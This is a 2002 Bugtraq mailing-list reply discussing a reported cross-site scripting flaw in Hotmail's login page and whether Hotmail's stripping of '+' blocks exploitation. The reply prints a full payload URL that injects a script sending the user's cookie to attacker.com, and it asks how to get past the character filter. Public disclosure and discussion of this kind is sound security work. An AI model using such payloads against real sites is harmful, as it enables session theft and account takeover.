Home page logo
/

bugtraq logo Bugtraq mailing list archives

RE: XSS bug in hotmail login page
From: Russell Harding <hardingr () cunap com>
Date: Mon, 7 Oct 2002 23:50:38 -0700 (MST)

Hello, comments below:

On Mon, 7 Oct 2002, Thor Larholm wrote:

It's very simple, you can inject arbitrary scripting to be executed by the
user in the context of hotmail. This means that you can e.g. steal his
cookies or, if he's logged in, write emails from his account, delete his
mails and change his password.


  I'm not sure this is the case (severity)... Hotmail strips +'s and %2B's
from GET requests.  While you can view your own cookies easily, I'm not
sure if you can still exploit this bug.  I do know filtering these
characters prevents this sort of attack:

http://lc2.law5.hotmail.passport.com/cgi-bin/login?_lang=&id=2&fs=1&cb=";><script>document.location.replace('http://attacker.com/steal.cgi?'+document.cookie);</script>&ct=1033054530&_setlang=

Is there another way to exploit this which I am not seeing? Or does MSN
actually have their act together (in this particular case...)?

       -Russell

P.S. Well, I suppose the real question may be this:
Is there a way to concatenate javascript strings without "+" or "%2B"?



On Mon, 7 Oct 2002, Thor Larholm wrote:

From: Peter Rdam [mailto:hell () weedmail com]
They didnt reacted, and im pretty curious about what
is possible with the bug. And i actually hope that
someone can tell me about it and maybe Microsoft will
do something about it..

It's very simple, you can inject arbitrary scripting to be executed by the
user in the context of hotmail. This means that you can e.g. steal his
cookies or, if he's logged in, write emails from his account, delete his
mails and change his password.



Regards
Thor Larholm
Jubii A/S - Internet Programmer



  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]